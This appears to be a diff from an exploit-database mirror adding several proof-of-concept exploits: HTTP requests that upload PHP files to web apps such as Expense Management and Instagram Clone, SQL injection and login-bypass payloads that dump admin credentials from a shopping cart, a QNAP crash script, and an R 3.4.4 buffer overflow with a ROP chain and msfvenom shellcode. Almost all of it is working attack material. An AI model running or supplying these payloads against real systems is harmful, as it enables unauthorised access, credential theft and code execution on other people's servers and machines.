User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/downloads.php?newdownload=1
Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160
Content-Length: 1029
Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="my_post_key"
6cb47e578ed16aa5272c55b0cb8745b4
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="name"
a"
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="shortdesc"
test
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="description"
test
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="image"
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="url"
1
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="numimages"
4
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="submit"
Publish download
-----------------------------171894060312075061251712806160--
3. Solution:
There is no public available solution.

92
exploits/php/webapps/45751.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: Expense Management 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.webprojectbuilder.com/item/expense-management
# Software Link: https://kent.dl.sourceforge.net/project/expense-management/php_ci-expense_manager-script-1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------187769406514267903921739782647
Content-Length: 743
-----------------------------187769406514267903921739782647
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------187769406514267903921739782647
Content-Disposition: form-data; name="fileOld"
g_1540845821.php
-----------------------------187769406514267903921739782647
Content-Disposition: form-data; name="users_id"
1
-----------------------------187769406514267903921739782647
Content-Disposition: form-data; name="user_type"
admin
-----------------------------187769406514267903921739782647
Content-Disposition: form-data; name="submit1"
-----------------------------187769406514267903921739782647--
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 20:50:40 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056; expires=Mon, 29-Oct-2018 22:50:40 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /[PATH]/assets/images/phpinfo_1540846240.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 20:51:11 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>
</form>
</body>
</html>

122
exploits/php/webapps/45752.txt Normal file
View file

@ -0,0 +1,122 @@
# Exploit Title: University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/pamzey
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Patrick%20Mvuma/unima.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/process.php
#
#[PATH]/process.php
#....
#1001 if(isset($_POST['addmember']))
#1002 {
#1003 if($_POST['memail']!=''&&$_POST['mfname']!=''&&$_POST['msname']!=''&&$_POST['mpassword']!=''&&$_POST['mpasswords']!='')
#1004 {
#1005
#1006 $mfname = mysqli_real_escape_string($db,$_POST['mfname']);
#1007 $msname = mysqli_real_escape_string($db,$_POST['msname']);
#1008 $memail=mysqli_real_escape_string($db,$_POST['memail']);
#1009 $mphone =mysqli_real_escape_string($db,$_POST['mphone']);
#1010 $rpassword = mysqli_real_escape_string($db,$_POST['mpasswords']);
#1011 $mpassword = mysqli_real_escape_string($db,$_POST['mpassword']);
#....
POST /[PATH]/process.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
mfname=efe&msname=efe&memail=efe@omerefe.com&mpassword=efe&mpasswords=efe&addmember=ghj
HTTP/1.1 302 Found
Date: Mon, 29 Oct 2018 18:44:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: addadmin.php
Content-Length: 127
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/process.php
#
#[PATH]/process.php
#....
#973 if(isset($_POST['schoolgrade'])){
#974
#975 //$adname=$_POST[''];
#976 $adname =$_POST["schoolgrade"];
#....
POST /[PATH]/process.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
schoolgrade='||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 18:51:22 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 421
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/process.php
#
#[PATH]/process.php
#....
#516 if(isset($_POST['usernames'])&&$_POST['password']) {
#517
#518 $usernames=$_POST['usernames'];
#519 $password=$_POST['password'];
#....
POST /[PATH]/process.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
usernames='or 1=1 or ''='&password='or 1=1 or ''='
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 18:04:45 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800
Set-Cookie: serial=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800
Content-Length: 247
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

91
exploits/php/webapps/45753.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Notes Manager 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.webprojectbuilder.com/item/notes-management
# Software Link: https://astuteinternet.dl.sourceforge.net/project/notes-manager/notes_management.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------95839047417419306891039500038
Content-Length: 737
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="fileOld"
g_1540845821.php
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="users_id"
1
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="user_type"
admin
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="submit1"
-----------------------------95839047417419306891039500038--
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 21:10:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ci_session=00cf0a180900e0b110b84343140d8f1c77a68493; expires=Mon, 29-Oct-2018 23:10:19 GMT; Max-Age=7200; path=/; HttpOnly
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /[PATH]/assets/images/phpinfo_1540847419.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=00cf0a180900e0b110b84343140d8f1c77a68493
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 21:10:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>
</form>
</body>
</html>

61
exploits/php/webapps/45754.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: Instagram Clone 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/justinwilliam
# Software Link: https://www.sourcecodester.com/sites/default/files/download/justinwilliam/instagram_3.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/add_profile.php
#
# http://localhost/[PATH]/uploads/[FILE]
#
POST /[PATH]/add_profile.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------18601636361709893820977649577
Content-Length: 369
-----------------------------18601636361709893820977649577
Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------18601636361709893820977649577
Content-Disposition: form-data; name="submit"
-----------------------------18601636361709893820977649577--
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 19:24:03 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/add_profile.php
#
<html>
<body>
<form action="[PATH]/add_profile.php" method="POST" enctype="multipart/form-data">
<input name="photo" type="file">
<button type="submit" name="submit" value="Ver Ayari">
</form>
</body>
</html>

139
exploits/php/webapps/45756.txt Normal file
View file

@ -0,0 +1,139 @@
# Exploit Title: Simple PHP Shopping Cart 0.9 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
POST /[PATH]/admin/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
username=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&btnSubmit=btnSubmit
HTTP/1.1 302 Found
Date: Tue, 30 Oct 2018 15:46:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST /[PATH]/admin/add_cat.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------17014069073451786011304294694
Content-Length: 514
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_name"
xxx
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_full_image"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="btn_submit"
Create
-----------------------------17014069073451786011304294694--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 15:46:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
#/[PATH]/category_images/xxx_phpinfo.php
<form action="http://localhost/[PATH]/admin/add_cat.php" enctype="multipart/form-data" method="post">
<input name="category_name" value="xxx" type="text" hidden="true">
<input name="category_full_image" type="file">
<input name="btn_submit" value="Create" type="submit">
</form>
# Exploit Title: Simple PHP Shopping Cart 0.9 - SQL Injection
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/shop/page.php?page_id=[SQL]
#
#[PATH]/page.php
#....
#34 $page_heading = $_GET['page_name'];
#35 $page_id = $_GET['page_id'];
#....
GET /[PATH]/shop/page.php?page_id=-1+unIoN++SELect+0x31%2c0x32%2c0x33%2c0x34%2c(SEleCT+GroUP_COncAT(username,0x3a,password+sePaRATOR+0x3c62723e)+FrOM+auth_user_admin)%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 14:01:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=u4nfc9bijgcbd8na09o8jp4gb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6538
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/admin/login.php
#
#....
#32 if ($_POST['btnSubmit']=='btnSubmit')
#33 {
#34 $sql = "SELECT * FROM auth_user_admin WHERE username='".$_POST['username']."' AND password='".md5($_POST['password'])."'";
#....
# POC:
# 3)
# http://localhost/[PATH]/shop/product.php?product_id=[SQL]
#
#....
#35 $product_id = $_GET['product_id'];
#....

92
exploits/php/webapps/45757.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: CI User Login and Management 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage 1: http://www.webprojectbuilder.com/item/user-login-and-management
# Vendor Homepage 2: https://sourceforge.net/projects/user-management-system/
# Software Link 1: https://kent.dl.sourceforge.net/project/php-user-login-management/PHP_CI_user_login_and_management-1.zip
# Software Link 2: https://netix.dl.sourceforge.net/project/user-management-system/PHP_CI_user_login_and_management-1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
212160558019833203481522967977
Content-Length: 727
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="fileOld"
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="users_id"
1
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="user_type"
admin
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="submit1"
-----------------------------212160558019833203481522967977--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:36:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: ci_session=599e598042864923e909b54019831db9d06c116f; expires=Tue, 30-Oct-2018 08:36:42 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /[PATH]/assets/images/phpinfo_1540881402.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=599e598042864923e909b54019831db9d06c116f
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:37:08 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>
</form>
</body>
</html>

25
exploits/windows/dos/45749.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)
# Date: 2018-10-29
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.qnap.com/en/
# Software Link: https://www.qnap.com/en/download
# Version: 4.5.6.0607
# Tested on: Windows XP Profesional Español SP3 x86
# Steps to Produce the Crash:
# 1.- Run python code : python qnap.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open NetBak Replicator.exe
# 4.- click on Restauración Instantánea
# 5.- Seleccione Origen -> "Ubicacion de red"
# 6.- click on "Dirección URL WebDAV"
# 7.- Paste ClipBoard on "Dirección URL WebDAV"
# 8.- Click "Aceptar".
# 9.- Crashed!
buffer = "\x41" * 5000
f = open("text.txt", "w")
f.write(buffer)
f.close()

79
exploits/windows/local/45738.py Executable file
View file

@ -0,0 +1,79 @@
#!/usr/bin/python
###############################################
# R 3.4.4 Win10 x86 Buffer Overflow #
# discovered by: bzyo #
# author: Charles Truscott #
# I love you Alison Thompson OAM #
# tested on: Windows 10 x86 #
# rebooted for practice defeating ASLR/DEP #
# #
# --------------------------------------------#
##############################################
# GUI Preferences -> paste boom.txt into 'Language for menus ...' -> click OK
import struct
pad = "A" * 292
rop = struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0x6e732b48) # ptr to &VirtualAlloc() [IAT R.dll]
rop += struct.pack("L", 0x6cba178c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll]
rop += struct.pack("L", 0x6ca57139) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack("L", 0x6bed7b2a) # POP EBP # RETN [Rlapack.dll]
rop += struct.pack("L", 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0xffffffff) # Value to negate, will become 0x00000001
rop += struct.pack("L", 0x6397474a) # NEG EAX # RETN [graphics.dll]
rop += struct.pack("L", 0x6c94e84f) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack("L", 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0xe7bf59f1) # put delta into eax (-> put 0x00001000 into edx)
rop += struct.pack("L", 0x6fed580f) # ADD EAX,1840B60F # RETN [grDevices.dll]
rop += struct.pack("L", 0x6ca3485a) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack("L", 0x63760b48) # POP ECX # RETN [Rgraphapp.dll]
rop += struct.pack("L", 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack("L", 0x71364d80) # NEG ECX # RETN [stats.dll]
rop += struct.pack("L", 0x6fed44a0) # POP EDI # RETN [grDevices.dll]
rop += struct.pack("L", 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack("L", 0x6c998dce) # POP EAX # RETN [R.dll]
rop += struct.pack("L", 0x90909090) # nop
rop += struct.pack("L", 0x7135a86c) # PUSHAD # RETN [stats.dll]
nop = "A" * 20
# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' cmd=calc.exe exitfunc=thread -f python
boom = ""
boom += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
boom += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
boom += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
boom += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
boom += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
boom += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
boom += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
boom += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
boom += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
boom += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
boom += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
boom += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
boom += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
boom += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
boom += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
boom += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
boom += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
end = "\xCC" * 588
